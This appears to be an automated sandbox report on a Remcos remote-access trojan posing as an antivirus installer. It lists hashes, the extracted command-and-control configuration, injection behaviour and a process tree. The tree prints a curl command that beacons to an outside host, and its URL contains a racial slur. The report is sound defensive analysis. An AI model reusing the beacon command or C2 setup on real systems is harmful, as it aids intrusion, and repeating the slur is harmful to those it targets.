Analysis
-
max time kernel
141s -
max time network
126s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
22-04-2024 11:57
Static task
static1
Behavioral task
behavioral1
Sample
och_antivirus.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
och_antivirus.exe
Resource
win10v2004-20240412-en
General
-
Target
och_antivirus.exe
-
Size
17.0MB
-
MD5
41d3613c3bd70904c8ed605bed978987
-
SHA1
8a44183362dc9dd222cb92b0e0a33b7eb3bc2c34
-
SHA256
69b943efb0b8f871b591ce1994bae3e550701a209f79c4d31e2451a69771b166
-
SHA512
bb80f240d675a3c8b0b756f9609bd146faa77bd1c4f23dd0a63825405166908af8aff621e2510e5f67a41e4ea181201ae50a000a3b5bc5ef68dd4806532172b1
-
SSDEEP
196608:H0bq45mXYPrOLaw1alaHwSiLPpizFNwR3LZBh51ZC1uBaPENjZZ:Ubq4oojOLahLhr9dDZwujL
Malware Config
Extracted
remcos
RemoteHost
178.33.57.155:443
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-PM1AI7
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 2 IoCs
Processes:
ptSrv.exeptSrv.exepid process 2140 ptSrv.exe 1020 ptSrv.exe -
Loads dropped DLL 13 IoCs
Processes:
ptSrv.exeptSrv.exepid process 2140 ptSrv.exe 2140 ptSrv.exe 2140 ptSrv.exe 2140 ptSrv.exe 2140 ptSrv.exe 2140 ptSrv.exe 2140 ptSrv.exe 1020 ptSrv.exe 1020 ptSrv.exe 1020 ptSrv.exe 1020 ptSrv.exe 1020 ptSrv.exe 1020 ptSrv.exe -
Processes:
och_antivirus.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA och_antivirus.exe -
Drops file in System32 directory 1 IoCs
Processes:
explorer.exedescription ioc process File opened for modification C:\Windows\SysWOW64\explorer.exe explorer.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
ptSrv.exedescription pid process target process PID 1020 set thread context of 1172 1020 ptSrv.exe cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Processes:
ptSrv.exeptSrv.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION ptSrv.exe Key created \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl ptSrv.exe Key created \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION ptSrv.exe Key created \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl ptSrv.exe -
Modifies registry class 1 IoCs
Processes:
explorer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings explorer.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
och_antivirus.exeptSrv.exeptSrv.execmd.exepid process 4600 och_antivirus.exe 4600 och_antivirus.exe 2140 ptSrv.exe 1020 ptSrv.exe 1020 ptSrv.exe 1172 cmd.exe 1172 cmd.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
ptSrv.execmd.exepid process 1020 ptSrv.exe 1172 cmd.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
ptSrv.exeptSrv.exedescription pid process Token: SeTakeOwnershipPrivilege 2140 ptSrv.exe Token: SeTakeOwnershipPrivilege 2140 ptSrv.exe Token: SeTakeOwnershipPrivilege 1020 ptSrv.exe Token: SeTakeOwnershipPrivilege 1020 ptSrv.exe -
Suspicious use of WriteProcessMemory 27 IoCs
Processes:
och_antivirus.exeptSrv.exeptSrv.execmd.exeexplorer.exeWScript.execmd.exedescription pid process target process PID 4600 wrote to memory of 2140 4600 och_antivirus.exe ptSrv.exe PID 4600 wrote to memory of 2140 4600 och_antivirus.exe ptSrv.exe PID 4600 wrote to memory of 2140 4600 och_antivirus.exe ptSrv.exe PID 2140 wrote to memory of 1020 2140 ptSrv.exe ptSrv.exe PID 2140 wrote to memory of 1020 2140 ptSrv.exe ptSrv.exe PID 2140 wrote to memory of 1020 2140 ptSrv.exe ptSrv.exe PID 1020 wrote to memory of 1172 1020 ptSrv.exe cmd.exe PID 1020 wrote to memory of 1172 1020 ptSrv.exe cmd.exe PID 1020 wrote to memory of 1172 1020 ptSrv.exe cmd.exe PID 1020 wrote to memory of 1172 1020 ptSrv.exe cmd.exe PID 1172 wrote to memory of 1720 1172 cmd.exe explorer.exe PID 1172 wrote to memory of 1720 1172 cmd.exe explorer.exe PID 1172 wrote to memory of 1720 1172 cmd.exe explorer.exe PID 1172 wrote to memory of 1720 1172 cmd.exe explorer.exe PID 1720 wrote to memory of 4792 1720 explorer.exe WScript.exe PID 1720 wrote to memory of 4792 1720 explorer.exe WScript.exe PID 1720 wrote to memory of 4792 1720 explorer.exe WScript.exe PID 4792 wrote to memory of 2132 4792 WScript.exe cmd.exe PID 4792 wrote to memory of 2132 4792 WScript.exe cmd.exe PID 4792 wrote to memory of 2132 4792 WScript.exe cmd.exe PID 2132 wrote to memory of 3852 2132 cmd.exe curl.exe PID 2132 wrote to memory of 3852 2132 cmd.exe curl.exe PID 2132 wrote to memory of 3852 2132 cmd.exe curl.exe PID 1172 wrote to memory of 1720 1172 cmd.exe explorer.exe PID 1720 wrote to memory of 1900 1720 explorer.exe WScript.exe PID 1720 wrote to memory of 1900 1720 explorer.exe WScript.exe PID 1720 wrote to memory of 1900 1720 explorer.exe WScript.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\och_antivirus.exe"C:\Users\Admin\AppData\Local\Temp\och_antivirus.exe"1⤵
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4600 -
C:\Users\Admin\AppData\Local\Temp\readermonitor_test_3\ptSrv.exeC:\Users\Admin\AppData\Local\Temp\readermonitor_test_3\ptSrv.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2140 -
C:\Users\Admin\AppData\Roaming\readermonitor_test_3\ptSrv.exeC:\Users\Admin\AppData\Roaming\readermonitor_test_3\ptSrv.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1020 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1172 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe5⤵
- Drops file in System32 directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\check1.vbs"6⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4792 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl http://94.156.66.107:9000/hooks/nigger?id=QUBJEIMO7⤵
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Windows\SysWOW64\curl.execurl http://94.156.66.107:9000/hooks/nigger?id=QUBJEIMO8⤵PID:3852
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\nihqlluvaxjcqgzkvtkrjgagmgkuam.vbs"6⤵PID:1900
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.4MB
MD5045bb8ad2f52ecd9dd9a98c091a8104e
SHA15047bf498dad1537f2308cc03e090a6b43f64ccd
SHA256ad0710db7f86bf4c43b98437ef1da37ac0f246658e6bb426bc6e4cb7a813ccd0
SHA512ec0df109f03508c6662f32bab28a2d6c58d052f3303bb3b521d6b993453320fffd64194d60340354e299a850bfed87ea8588a4f2f495c7908948309528b4bde2
-
Filesize
1.2MB
MD5ec23407f1e09987b36550d5b2ebff6d9
SHA1c462cdf2a3fe50e2bedae7c8b92b4961dbb1276a
SHA2563ecb2ee304aebc28894984a1704a16d80efdf0b15810272179115b58078faf3c
SHA512883fdd28a47053218b045755e3d1c1dc3334cf7f4a9735f00df2f6d9211816165779ec96ec63137746abc7cc39f4dbf2c03f6b8a5c0c5d8c642f6ef2690de473
-
Filesize
146B
MD585a2ebad40c21ba1da77230265b5351f
SHA1803822e08837ebda5de7dde963e4872ae2fc4c21
SHA256b5c409cbb25690b000d9d36c3b5170c1e61fff3d89bdaeadf0166ae28b0fdff9
SHA51277374eb3d9632c45c25c997380eab1ee338fbe659a24679b3cf28e76d67ffa71e2d2ea326181909d06970dca0e92b5528c1e7f9c866493162fd77170f87ea83a
-
Filesize
324B
MD55969db124f530f24b0e1b305ca5a8291
SHA15eb79a70cc356a20ba39913489a5cdca36f83011
SHA2563a4ae3a89b9c1d79fbef06dd969b1307837c0378966c5f7ceddafb1e4660a072
SHA5120297ea245560c1b5fe64f5a3cd7769ea4e9f09dfc4cc4f16c8d96c5b5d846c8982458991aa143ea5a103436a03c5e7d5b7769b2b87bca5565e856de960e2e290
-
Filesize
427KB
MD571a0aa2d05e9174cefd568347bd9c70f
SHA1cb9247a0fa59e47f72df7d1752424b33a903bbb2
SHA256fdb3d86c512adff90967cb860d02a4682850ab96727f0376e4d4836504c50e47
SHA5126e65520528facaa4058720eb16d6bfdcc7bb36923b7e8e6551f3526709f0fabafab123999e618438e6abe7efed4a1332547cfc988f2b24b0e3d91198b95a911a
-
Filesize
81KB
MD516b26bc43943531d7d7e379632ed4e63
SHA1565287de39649e59e653a3612478c2186096d70a
SHA256346f72c9a7584c2ab6ce65cd38a616c77ebddc0bbab2274c4e89dd5e62237517
SHA512b5b7b4b8c5ab4276a34956e43f586272b1803ec3609253fee1bcc0a549aed7ba11d47404b023f7b67af701726bab95cca55738e7bd5bca272eca5ac71bb418cc
-
Filesize
590KB
MD5b3e030ab715a02f8864a79f552a247b7
SHA14b1c18370b6e8a69c5f8b3ff543375f74e6e58fa
SHA2562a844750786ab6798e9a26de7f080802f709c0f12ba7a31545f0c2e449ac0955
SHA512cd030a0a9e6109b27b5f5d3299024c222287487bc9fac1edd92b760425a939bc307b1d15801fec7e274bd8377b8dd9c7883674d1488af5f062a102275a373eda
-
Filesize
1.0MB
MD5c08c443520df3d30875ddc0e718f3346
SHA1ff9ac03414433f597f58dce45dca0eb16d522964
SHA256a22a7cecd7605ba16418b32079fe856ce4dc923b894986a472963aeb0fc0c6e1
SHA512bf60ba1ee45f4f55851eb946d34bcd992379245e2ac7bd6da5e5c2bfc296b25ae88918d50d941710121028bfb8f9e32797ba6c885524bcc37426898b2ada1858
-
Filesize
28KB
MD5db3f3969e8a2f913fe3643d8465171b1
SHA1736095ea1e02547a6df2586fffdbf31bb7d23656
SHA256c207be09bf97912ed1271a4186bb626edc530c76f3e5edcac883a98946c41043
SHA5120a2948bad6e3f6338fb44a727e0de4d268db6a6e5933331b54b12877da0f3b75a796cb32e86cd251b4afc4ca9df5aaccb04db1153b31fc77318ce8909b18d81b
-
Filesize
2.5MB
MD52087eb2d3fb639933ebe0a0614fd5218
SHA1c1a1b75c8e76e000b7045092bd11100904a72840
SHA256725f50650cb9490027b633a1ff0ae166cb6fc42037dbe72d9a09dd65be323a1f
SHA5123390536ed543529d01ed7d1616d36d6fde67d68bf6641f901ac5c081ede043943dacd3a7a0bf1729945be800d4ccda00c07511e1c23c7c33d9864be50645502e
-
Filesize
202KB
MD564179e64675e822559cac6652298bdfc
SHA1cceed3b2441146762512918af7bf7f89fb055583
SHA256c26db97858c427d92e393396f7cb7f9e7ed8f9ce616adcc123d0ec6b055b99c9
SHA512ef740b35ea5190f8ee47776af1f15ebdd54d39c84da5665e64f67ae6dd0f4b181e955e9a35319a5d0bd764972562e8f2bc44dbdf83c3bedf05674eae902e7280
-
Filesize
165KB
MD53c3e960d59cb413791fee1e944b6df72
SHA14aa6c90d81692642ca8266bf0d8e249ff3e3ad54
SHA25688378c228d7827974fe6ec827837af7571290e129082e7070d4bff7a42f4ba67
SHA51285b471aa2a066c6a779384ed102b895af108af51cd718bb834cda107f71bf5e6fcd8ecc77e9ea4fd7fd3ddbc10b1f57870a9bafcbbfa1be8e2ba224651d77aac
-
Filesize
103KB
MD5c2b06a78b6c07a1371b6aed1dbf4fc37
SHA1b8847693e7cd3637b1b400e71430cdf629de2e64
SHA2569e2b2d67d0e70651a64a3febee9f2698d8a939633587fe973a30758368cffc04
SHA512219965e4b3e9f237f75d9306bdf5a08c872cded973009da64c58221e1bbdbfda35e4861c4c0b6687fca7c67ef496b307695af5e1270f8d5c3cf71a3fc02c6411